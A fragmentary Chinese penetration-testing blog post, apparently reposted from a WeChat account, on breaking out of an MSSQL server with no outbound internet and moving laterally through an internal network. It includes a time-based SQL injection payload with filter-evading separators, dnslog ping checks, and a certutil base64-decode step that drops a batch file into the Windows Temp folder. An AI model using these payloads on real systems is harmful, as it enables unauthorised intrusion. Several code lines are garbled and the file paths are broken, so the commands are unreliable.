某次遇到mssql不出网,然后研究研究.
不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
poc:WAITFOR%1eDELAY%1e'0:0:4'
思考:
1.写文件,需要判断是否站库分离
2.直接上线,需要利用dns上线
3.内网自动化渗透,寻找出网机器.
思考:
目标有别的防护,没有成功写入.
要不就是站库分离,不存在web路径.
怎么能确定是站库分离呢
不断思考,他可以dnslog哎,利用dnslog去确定是否正常写入.
@echo offping dnslog
echo QGVjaG8gb2ZmC== >C:WindowsTemp1.txtcertutil -decode C:WindowsTemp1.txt C:WindowsTemp1.bat
with open('1.txt', 'r') as file:content = file.read()content = content.replace('n', '')print(content)with open('result.txt', 'w') as file:file.write(content)
考证咨询
最优惠报考各类安全证书(NISP/CISP/CISSP/PTE/PTS/PMP/IRE等....),后台回复"好友位"咨询。
技术交流
原文始发于微信公众号(Z2O安全攻防):攻防实战-mssql突破不出网到自动化内网漫游
原文始发于微信公众号(Z2O安全攻防):攻防实战-mssql突破不出网到自动化内网漫游
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论